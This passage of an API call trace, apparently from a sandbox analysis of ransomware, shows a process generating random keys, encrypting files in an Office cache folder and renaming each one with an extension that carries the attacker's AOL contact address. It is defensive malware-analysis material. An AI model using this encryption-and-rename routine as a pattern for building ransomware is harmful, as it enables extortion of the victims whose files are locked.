	[0092.302] GetProcessHeap () returned 0x540000
	[0092.302] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb648 | out: hHeap=0x540000) returned 1
	[0092.302] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=715834) returned 1
	[0092.302] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xaec3a
	[0092.302] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0092.303] GetProcessHeap () returned 0x540000
	[0092.303] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0092.303] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0092.303] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0092.304] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0092.304] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0092.305] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xaec3a) returned 0x3010020
	[0092.305] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xaec3a) returned 0x35e0020
	[0092.305] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0092.305] ReadFile (in: hFile=0x498, lpBuffer=0x3010020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3010020*, lpNumberOfBytesRead=0x3a1f778*=0xaec3a, lpOverlapped=0x0) returned 1
	[0092.336] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0092.336] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0092.336] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll", dwFileAttributes=0x80) returned 1
	[0092.337] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 75
	[0092.337] GetProcessHeap () returned 0x540000
	[0092.337] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0092.337] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll"
	[0092.337] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR"
	[0092.337] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0092.340] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0092.341] GetProcessHeap () returned 0x540000
	[0092.341] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0092.341] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1463568) returned 1
	[0092.341] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x165510
	[0092.341] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0092.341] GetProcessHeap () returned 0x540000
	[0092.341] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0092.341] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0092.341] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0092.343] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0092.343] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0092.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x165510) returned 0x3c20020
	[0092.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x165510) returned 0x3d90020
	[0092.344] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0092.344] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x165510, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x165510, lpOverlapped=0x0) returned 1
	[0092.413] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0092.413] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0092.413] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", dwFileAttributes=0x80) returned 1
	[0092.414] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 76
	[0092.414] GetProcessHeap () returned 0x540000
	[0092.414] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0092.414] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab"
	[0092.414] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0092.414] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0092.416] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0092.416] GetProcessHeap () returned 0x540000
	[0092.416] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0092.416] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=36233052) returned 1
	[0092.417] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x228df5c
	[0092.417] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0092.417] GetProcessHeap () returned 0x540000
	[0092.417] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0092.417] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0092.417] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0092.419] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0092.419] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0092.419] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x228df5c) returned 0x3c20020
	[0092.420] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x228df5c) returned 0x5eb0020
	[0092.421] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0092.421] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x228df5c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x228df5c, lpOverlapped=0x0) returned 1
	[0094.830] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0094.830] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0094.830] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll", dwFileAttributes=0x80) returned 1
	[0094.830] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 74
	[0094.830] GetProcessHeap () returned 0x540000
	[0094.830] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfa) returned 0x5b8568
	[0094.830] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll"
	[0094.830] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR"
	[0094.831] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0094.832] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0094.833] GetProcessHeap () returned 0x540000
	[0094.833] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0094.833] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=7378792) returned 1
	[0094.833] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x709768
	[0094.833] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0094.833] GetProcessHeap () returned 0x540000
	[0094.833] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0094.833] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0094.833] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0094.836] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0094.836] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0094.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x709768) returned 0x3c20020
	[0094.836] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x709768) returned 0x4330020
	[0094.837] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0094.837] ReadFile (in: hFile=0x498, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x709768, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x709768, lpOverlapped=0x0) returned 1
	[0095.317] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0095.317] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0095.317] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", dwFileAttributes=0x80) returned 1
	[0095.318] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 71
	[0095.318] GetProcessHeap () returned 0x540000
	[0095.318] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf4) returned 0x57fb28
	[0095.318] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe"
	[0095.318] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0095.318] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0095.320] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0095.320] GetProcessHeap () returned 0x540000
	[0095.320] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0095.320] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=174440) returned 1
	[0095.320] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2a968
	[0095.320] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0095.320] GetProcessHeap () returned 0x540000
	[0095.320] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0095.320] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0095.321] WriteFile (in: hFile=0x498, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0095.322] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0095.322] WriteFile (in: hFile=0x498, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0095.323] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2a968) returned 0x3790048
	[0095.324] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2a968) returned 0x37ba9b8
	[0095.324] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0095.324] ReadFile (in: hFile=0x498, lpBuffer=0x3790048, nNumberOfBytesToRead=0x2a968, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesRead=0x3a1f778*=0x2a968, lpOverlapped=0x0) returned 1
	[0095.328] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0095.328] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0095.329] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1
	[0095.329] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 78
	[0095.329] GetProcessHeap () returned 0x540000
	[0095.329] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x598b60
	[0095.329] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml"
	[0095.329] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0095.329] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0095.331] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498
	[0095.331] GetProcessHeap () returned 0x540000
	[0095.331] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0095.331] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=4274) returned 1
	[0095.331] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10b2
	[0095.332] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0095.332] GetProcessHeap () returned 0x540000
	[0095.332] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
